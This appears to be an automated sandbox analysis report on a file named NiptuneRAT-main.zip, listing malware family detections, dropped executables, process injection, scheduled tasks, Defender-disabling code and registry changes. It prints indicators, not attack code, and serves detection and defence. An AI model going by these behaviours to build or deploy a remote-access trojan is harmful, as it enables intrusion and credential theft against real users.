Analysis Overview
SHA256
5b054b368eda8d148383e6a64d890b885d9a0b1898493e1008ffe1a531118b6b
Threat Level: Known bad
The file NiptuneRAT-main.zip was found to be: Known bad.
Malicious Activity Summary
Arrowrat family
Detect Umbral payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Detect Xworm Payload
Umbral family
AgentTesla
AgentTesla payload
Agenttesla family
Asyncrat family
Contains code to disable Windows Defender
AsyncRat
Xworm
Grants admin privileges
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Delays execution with timeout.exe
Enumerates system info in registry
Modifies data under HKEY_USERS
Gathers system information
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Runs net.exe
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Gathers network information
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-17 21:41
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Agenttesla family
Arrowrat family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win7-20240221-en
Max time kernel
359s
Max time network
364s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win10-20240221-en
Max time kernel
314s
Max time network
394s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.1.0.0.0.8.1.0.0.0.2.0.0.8.4.0.0.0.2.0.0.8.2.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-17 21:41
Reported
2024-03-17 21:52
Platform
win10v2004-20240226-en
Max time kernel
207s
Max time network
518s
Command Line
Signatures
AgentTesla
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4936 created 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\$77.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4936 set thread context of 3728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 = 7e003100000000007158b6ad11004465736b746f7000680009000400efbe5a58c8707158b7ad2e0000007ce101000000010000000000000000003e00000000007d0937004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 68003100000000007158bcad10004e495054554e7e310000500009000400efbe7158b6ad7158bdad2e00000066690100000005000000000000000000000000000000adaf97004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
